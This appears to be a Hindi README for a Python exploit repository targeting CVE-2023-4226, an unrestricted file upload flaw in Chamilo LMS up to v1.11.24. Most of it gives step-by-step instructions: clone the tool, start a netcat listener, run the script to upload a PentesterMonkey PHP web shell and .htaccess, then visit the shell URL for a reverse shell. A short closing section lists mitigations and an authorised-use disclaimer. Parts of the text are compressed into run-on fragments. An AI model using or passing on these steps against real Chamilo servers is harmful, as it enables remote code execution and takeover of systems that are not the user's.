
अप्रतिबंधित फ़ाइल अपलोड भेद्यता **Chamilo LMS** (<= v1.11.24) में।
CVE-2023-4226 के शोषण को स्वचालित करने वाला Python स्क्रिप्ट, जो Chamilo LMS (<= v1.11.24) में एक असीमित फ़ाइल अपलोड भेद्यता है। PentesterMonkey पर आधारित PHP वेब शेल अपलोड करता है और रिवर्स शेल प्राप्त करने के लिए .htaccess कॉन्फ़िगर करता है। अधिक जानकारी: STAR Labs की सलाह
/main/inc/ajax/work.ajax.php में PHP फ़ाइलें अपलोड कर सकते हैं, जिससे RCE प्राप्त होता है।ch_sid)।rce.php को IP और पोर्ट के साथ।/main/work/work.php?cidReq=HW पर GET।rce.php और .htaccess अपलोड करने के लिए /main/inc/ajax/work.ajax.php पर POST।/app/cache/rce.php)।Python: requests, colorama।
pip install requests colorama
फ़ाइलें: rce.php (PentesterMonkey, रिपॉजिटरी में शामिल), .htaccess (स्क्रिप्ट द्वारा उत्पन्न).
नेटवर्क: लिसनर के लिए IP और पोर्ट (उदा. nc -lvnp 4444)।
रिपॉजिटरी क्लोन करें:
git clone https://github.com/SkyW4r33x/CVE-2023-4226
cd CVE-2023-4226
स्क्रिप्ट को निष्पादन अनुमति दें:
chmod +x CVE-2023-4226.py
निर्भरताएँ स्थापित करें:
pip install requests colorama
एक टर्मिनल में लिसनर प्रारंभ करें:
nc -lvnp 4444
स्क्रिप्ट चलाएँ:
./CVE-2023-4226.py
दर्ज करें:
ch_sid।रिवर्स शेल प्रारंभ करने के लिए वेब शेल तक पहुँचें:
http://<chamilo>/app/cache/rce.php
उदाहरण: http://chamilo.local/app/cache/rce.php
Chamilo >= v1.11.26 में अपडेट करें।
फ़ाइल नामों को स्वच्छ करें।
disable_dangerous_file() में HTML को ब्लॉक करें।
.htaccess में जोड़ें:
RedirectMatch 403 ^/main/inc/lib/javascript/bigupload/files
Header set X-Content-Type-Options nosniff
केवल अधिकृत परीक्षण के लिए उपयोग। अनधिकृत उपयोग अवैध है।